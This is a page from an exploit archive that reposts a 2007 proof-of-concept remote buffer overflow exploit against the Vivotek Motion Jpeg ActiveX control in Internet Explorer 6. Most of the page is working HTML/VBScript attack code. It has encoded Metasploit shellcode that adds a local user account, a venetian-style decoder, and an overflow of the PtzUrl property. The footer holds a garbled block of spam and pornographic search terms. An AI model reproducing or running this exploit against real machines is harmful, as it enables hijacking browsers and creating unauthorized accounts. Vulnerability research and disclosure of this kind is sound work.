about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit




2007-06-03 Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit 
Rated as : High Risk

<!-- IE 6 / Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13)
remote buffer overflow exploit / win 2k sp4 en version
by rgod
site: retrogod.altervista.org

software site: http://www.vivotek.com/
"VIVOTEK INC. is a leading IP surveillance camera and Network
camera firm specialized in IP camera, Wireless network camera,
IP surveillance camera"

some notes,
PtzUrl property is vulnerable to a stack based buffer overflow
we are in control of EIP, ESI, EDI, EBP , *all* in UNICODE
expanded strings
I used the "venetian method" to fully patch the shellcode
This works from remote (2 on 3) or by dragging the html file
into the browser window, not by clicking it

Object safety report:

RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
-->
<HTML>
<OBJECT classid='clsid:EAA105FE-7BBD-4196-8B96-D46743894195'
id='MjpegControl' ></OBJECT>
<script language='vbscript'>

' metasploit one, alpha2... add a user 'sun' with pass 'tzu'
FRAGMENT =
unescape("%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%71%40%71%40%71%40%71%40%71%40%72%40%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%eb%59%05%f8%ff%49%49%49%49%49%49%49%49%49%51%6a%58%30%31%42%42%78%42%42%41%30%41%50%42%75%39%6c%48%44%70%70%50%4b%35%6c%4b%6c%65%58%31%6f%4b%6f%38%4b%4f%70%61%6b%69%6b%34%6b%51%6e%31%70%79%6c%64%30%64%37%31%7a%4d%51%72%6b%54%4b%34%44%64%65%45%6b%4f%44%31%6b%66%4b%6c%6b%4b%6f%4c%71%4b%4b%4c%6b%51%4b%79%6c%54%74%73%61%50%64%4b%70%50%75%70%58%6c%4b%50%6c%6b%50%6c%4d%6b%38%48%4b%79%6b%30%50%70%30%70%4b%78%4c%6f%41%46%50%46%69%58%53%70%6b%50%48%6e%38%72%53%38%78%4e%6a%4e%37%6f%47%73%6d%44%4e%35%38%45%50%6f%43%30%4e%45%34%30%55%33%75%42%70%43%65%4e%50%54%58%35%70%4f%61%44%34%50%56%56%50%4e%55%64%50%6c%6f%63%51%4c%47%72%6f%75%70%30%71%44%6d%49%6e%79%73%74%62%41%64%6f%62%63%50%33%65%4e%50%6f%71%34%74%50%c3")

c1 = unescape("%95")                : REM xchg eax, ebp
C2 = unescape("%6e%05%ff%02")       : REM add eax 0200ff00h
C3 = unescape("%6e%2d%12%02")       : REM sub eax 02001200h
C4 = unescape("%6e%40%6e")          : REM inc eax
C5 = unescape("%80%90%6e%40%6e%40") : REM add byte ptr eax 90 ,
inc eax twice
C6 = unescape("%6e%80%90%6e%40%6e%40") : REM and again ... add
byte ptr esi works as nop

CODE = C1 & C2 & C3 & C4 & C5 & C6 & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%03%6e%40%6e%40") & _
unescape("%6e%80%eb%6e%40%6e%40%6e%80%e8%6e%40%6e%40") & _
unescape("%6e%80%ff%6e%40%6e%40%6e%80%ff%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%5a%6e%40%6e%40") & _
unescape("%6e%80%68%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%38%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%6d%6e%40%6e%40%6e%80%69%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%35%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%4c%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%46%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%33%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%75%6e%40%6e%40") & _
unescape("%6e%80%76%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%52%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%6b%6e%40%6e%40") & _
unescape("%6e%80%4e%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%6f%6e%40%6e%40%6e%80%4b%6e%40%6e%40") & _
unescape("%6e%80%44%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%38%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%76%6e%40%6e%40") & _
unescape("%6e%80%56%6e%40%6e%40%6e%80%51%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%43%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%62%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%7a%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4a%6e%40%6e%40") & _
unescape("%6e%80%4f%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%45%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%47%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6a%6e%40%6e%40%6e%80%4d%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%59%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%64%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%74%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%35%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%31%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%42%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%63%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%90%6e%40%6e%40%6e%40%6e")

bof         = string(262,unescape("%12"))
useful_junk = unescape("%12%12%12%12") 'not touch
junk        = string(32,unescape("%12"))
eip         = unescape("%23%7d") : REM 0x007d0023   call edi, 
module comctl32 found with msfpescan
suntzu      = bof + eip + useful_junk + junk + CODE + FRAGMENT +
string(16,unescape("%90"))

MjpegControl.PtzUrl = suntzu

</script>
</HTML>


securitydot.net - 2007-06-03

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 23:32:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sania sex xxx sex pidhat e l xp/exploit sania sex GET /galle Htp Www Ga joomla rem pidhat e l www 123cli r57shell.p www.caoliu www.Weptri t432t isc bind 200 /compo fuck v pearl-neck news for c slackware SEX CMS is Fre Www.+Vidio mambo Remo www.2d30.c Eng www.2008sf WebSPELL http:www.6 www.diychi mambo%20Re videosxxx8 news for c www.trish 23007 www.word s mambo Remo _________ samira.sex news for c d-link di- html page J LO CMS is Fre 200 /compo dr ftpd Network C Date sixmovi usbbot